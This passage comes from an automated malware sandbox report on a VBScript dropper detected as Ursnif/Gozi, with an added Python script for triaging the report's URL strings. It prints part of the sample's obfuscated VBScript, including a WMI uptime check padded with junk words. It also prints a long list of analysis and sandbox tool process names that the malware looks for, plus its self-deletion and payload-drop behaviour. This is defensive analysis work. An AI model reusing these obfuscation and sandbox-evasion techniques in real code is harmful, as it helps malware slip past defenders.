            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml5.19.drString found in binary or memory: http://www.reddit.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml6.19.drString found in binary or memory: http://www.twitter.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml7.19.drString found in binary or memory: http://www.wikipedia.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml8.19.drString found in binary or memory: http://www.youtube.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: iexplore.exe, 0000001B.00000002.482442404.0000000000A57000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/
            Source: iexplore.exe, 0000001B.00000002.484411041.0000000000AE3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.comi1/s2I4U4mE/_2BQkctvXdCdE5BVzv5DPCn/MMxp_2BtIk/bZ47Bu_2B7GtuUfsB/s7A_2F49C1qC/
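            Nearly every iexplore.exe string above comes from one read-only, image-backed dump at 0x5833000 and is Internet Explorer's own search-provider and favicon table, not an indicator for this sample. The rows that deserve a look are the few from writable regions (0xA57000, 0xA9C000, 0xAE3000), and of those the last is the interesting one: its path carries the `_2B`/`_2F` substitutions that Ursnif/Gozi (ISFB) applies to its base64-encoded request URIs. The following Python is an editor's example added to this page, not part of the Joe Sandbox report; it parses rows in the shape shown above and splits them into static, runtime and suspicious buckets. It assumes " | " as the column separator, assumes the fifth field of the dump name is the region's Win32 page protection (0x02 PAGE_READONLY, 0x04 PAGE_READWRITE), and runs on five constructed rows modelled on this report.

```python
import re
from urllib.parse import urlsplit

# Constructed input: five rows in the shape of this report's
# "String found in binary or memory" entries, " | " assumed as separator.
SAMPLE_ROWS = """\
Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmp | String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/
Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: iexplore.exe, 0000001B.00000002.482442404.0000000000A57000.00000004.00000020.sdmp | String found in binary or memory: https://login.live.com/
Source: iexplore.exe, 0000001B.00000002.484411041.0000000000AE3000.00000004.00000020.sdmp | String found in binary or memory: https://login.live.comi1/s2I4U4mE/_2BQkctvXdCdE5BVzv5DPCn/MMxp_2BtIk/bZ47Bu_2B7GtuUfsB/s7A_2F49C1qC/
"""

ROW_RE = re.compile(
    r"Source:\s*(?P<proc>[^,]+),\s*(?P<dump>[0-9A-Fa-f.]+\.sdmp)\s*\|\s*"
    r"String found in binary or memory:\s*(?P<url>\S+)"
)

# Assumption: the 5th dump-name field is the Win32 page protection of the
# dumped region (0x02 = PAGE_READONLY, 0x04 = PAGE_READWRITE).
PAGE_READONLY = 0x02

# Ursnif/Gozi (ISFB) request paths are base64 with '+' and '/' rewritten
# as '_2B' and '_2F'; two or more such tokens in one path is a strong hint.
ENCODED_TOKEN_RE = re.compile(r"_2[BF]")


def parse_dump_name(name):
    """Split '<pid>.<run>.<id>.<base>.<protect>.<type>.sdmp' into integers."""
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 6:
        raise ValueError(f"unexpected dump name: {name}")
    keys = ("pid", "run", "id", "base", "protect", "type")
    return {k: int(v, 16) for k, v in zip(keys, fields)}


def parse_row(line):
    """Return {'proc', 'dump', 'url', 'dump_info'} for one report row, else None."""
    m = ROW_RE.search(line)
    if not m:
        return None
    row = m.groupdict()
    row["dump_info"] = parse_dump_name(row["dump"])
    return row


def classify(row):
    """Bucket one row:
    'suspicious' - path looks like an ISFB-encoded request URI;
    'static'     - read-only image data (IE's own URL tables, safe to ignore);
    'runtime'    - writable memory, built or received while the process ran,
                   so worth a manual look even when the URL looks benign."""
    path = urlsplit(row["url"]).path
    if len(ENCODED_TOKEN_RE.findall(path)) >= 2:
        return "suspicious"
    if row["dump_info"]["protect"] == PAGE_READONLY:
        return "static"
    return "runtime"


def triage(report_text):
    """Group every parsable row's URL by classification, preserving order."""
    buckets = {"suspicious": [], "static": [], "runtime": []}
    for line in report_text.splitlines():
        row = parse_row(line)
        if row is None:
            continue
        buckets[classify(row)].append(row["url"])
    return buckets


if __name__ == "__main__":
    for label, urls in triage(SAMPLE_ROWS).items():
        print(f"{label} ({len(urls)})")
        for u in urls:
            print("   ", u)
```

On the five constructed rows this yields three static strings, one runtime string (https://login.live.com/) and one suspicious string. Note that `login.live.comi1` is not a valid hostname: the string scanner most likely ran a legitimate login.live.com string together with an adjacent heap buffer, so the encoded path is the usable artefact here and the real C2 host has to come from the network trace, not from this row.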

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 00000004.00000003.388410277.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.388483202.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.388462091.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.388313848.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.388384941.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.388506771.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.388360455.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.388280656.0000000005888000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif
            Source: Yara match; File source: the same eight memory dumps listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above
            Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Temp\Mardi.rm D3A93385847D628EBF1FF01E9C0F1639731E4D2D63540C9A13311D172E5C4822
            Source: DGDvEtyCrEmX.vbs; Initial sample: Strings found which are bigger than 50
            Source: classification engine; Classification label: mal100.troj.evad.winVBS@6/28@3/1
            Source: C:\Program Files\internet explorer\iexplore.exe; File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
            Source: C:\Windows\System32\wscript.exe; File created: C:\Users\user\AppData\Local\Temp\adobe.url
            Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\DGDvEtyCrEmX.vbs'
            Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe; File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\wscript.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\DGDvEtyCrEmX.vbs'
            Source: unknown; Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3888 CREDAT:17410 /prefetch:2
            Source: unknown; Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7164 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3888 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window Recorder; Window detected: More than 3 window changes detected
            Source: DGDvEtyCrEmX.vbs; Static file information: File size 1363932 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: e:\Said\44\1\office\84\Decimal\97\School\check\33\65\Change\Blue\58\Hold.pdb source: Mardi.rm.0.dr

            Data Obfuscation:

            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exe; Anti Malware Scan Interface: WScript.ScriptName, cStr(847811303)) > 0 And lwgUgj = 0) ThenREM agar downtown254 radiometer. Alger881 massif incandescent upholster phthalate infringe505 actuarial Stuyvesant426 Seagram ceil gavotte pavanne deal acquaint potpourri agent Strickland snarl impugn inflow enchantress afterglow walla typesetting346 papery Galilean venetian tachinid duke neurosis82 stone Alsop735 legislature. 3984689 ourselves Middletown Boston. 8865891 caiman inter949 trailhead hotbed gravitometer Rudolf comprehension woodlot102 rockaway60 bride insuppressible Roland. banjo Jericho discus Egyptology Leone992 Calder Jeres168 portfolio tick memorandum nun guerdon ad waitress teaspoon quiescent haberdashery413 snivel wall808, 3662841 repairmen944 aircraft fish suspend estop cherubim dervish goldsmith21 purl casebook oppression90 Nebraska niggardly conjoin Whitney diagnostic coronary Exit Function' retrograde tetravalent nodular contraceptive1000 Siegfried, 7635598 permit butterscotch20. 397239 Iranian stumpy chew694 Burtt talus lilt macaw triennial fence, Napoleonic55 fumarole Rayleigh glutinous coastline harpsichord262, sanitate statue486 abrasion facade sorrow424 appropriable handicraft lard dulse crop Conway birch715 Rensselaer accompany Java, Huffman216 bluestocking205. candlewick. 2410549 septuagenarian salad inchworm Algonquian834. granular inflow946 holography contempt21 crow Sylow programmatic505 chugging snout veranda. geology915 superstitious latter. instructor constructible pact.
24640 TTY193 Reuters Munich mozzarella line oleomargarine microbial739 thyronine612 consider atrophic aside doubleheader End Ifset convulsive209 = GetObject("winmgmts:\\.\root\cimv2")set paranoiac949lOS = convulsive209.InstancesOf("Win32_OperatingSystem")for each BmsCmAs in paranoiac949lOSrummy709 = BmsCmAs.LastBootUpTimeVinOkID = Mid(rummy709,1,4) & "-" & Mid(rummy709,5,2) & "-" & Mid(rummy709,7,2) & " " & Mid(rummy709,9,2) & ":" & Mid(rummy709,11,2) & ":" & Mid(rummy709,13,2)fCnuPqec = abs(datediff("s",VinOkID,now))talcum = fCnuPqec \ 60CWXya = talcum \ 60' Isadore spacious297 coolheaded, bond, kwashiorkor Hoagland ransom114 inlaid84 Hines cocoon Malabar oocyte townsman mimeograph. nature invasion roundhead. 9691090 prosecutor Herculean symphonic frog Harlem. quandary upbeat towel Euphrates Markovian362 knowledge337 heretofore suspend378 train deleterious. 951307 face axial615 elementary began agnostic. Anglo corpora Millard. solecism mystery drophead652 series offspring hazard rigid Cameroun volcanism113 phosphorescent787 Sus mangrove ancillary upbeat977 stockroom. horoscope debar, talcum = talcum mod 60REM brae fledge spikenard auspice balm detail fad bounty libation largemouth Posner257 sunfish folksong alkali Plato crappie height corpse Ciceronian kale paradigmatic dark bone airflow. Jupiter265 lemming, 7953719 isomer bowmen3 antipode hysterectomy betony godparent amateur uptake hebephrenic Dutton miasma tapeworm eyelid Skopje republican immodesty protrusion porphyry w

            Persistence and Installation Behavior:

            Creates processes via WMI
            Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe; File created: C:\Users\user\AppData\Local\Temp\Mardi.rm

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match; File source: the same eight memory dumps listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above
            Deletes itself after installation
            Source: C:\Windows\System32\wscript.exe; File deleted: c:\users\user\desktop\dgdvetycremx.vbs
            Source: C:\Windows\System32\wscript.exe; Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
            Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: AUTORUNS.EXE88
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: APISPY.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: PEID.EXE@#Z
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: OLLYDBG.EXE@
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: SBIECTRL.EXE@
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: FORTITRACER.EXEP
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: IDAQ.EXE06
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: AUTORUNSC.EXE(
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: SANDBOXIERPCSS.EXE@V5
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: TCPDUMP.EXE5
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE2
            Source: wscript.exe, 00000000.00000003.251254636.0000018687710000.00000004.00000001.sdmp; Binary or memory string: SCKTOOL.EXE
            Source: wscript.exe, 00000000.00000003.260914754.0000018688F80000.00000004.00000001.sdmp; Binary or memory string: PROCMON.EXE7
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: DUMPCAP.EXE
            Source: C:\Windows\System32\wscript.exe; File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Mardi.rm
            Source: C:\Windows\System32\wscript.exe TID: 7140; Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe; File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exe; File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Local
            Source: iexplore.exe, 0000001B.00000002.482442404.0000000000A57000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe; File created: Mardi.rm.0.dr
            Source: C:\Windows\System32\wscript.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\irresistible.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.260914754.0000018688F80000.00000004.00000001.sdmp; Binary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.260914754.0000018688F80000.00000004.00000001.sdmp; Binary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.256082418.00000186869CD000.00000004.00000001.sdmp; Binary or memory string: icesword.exe
            Source: <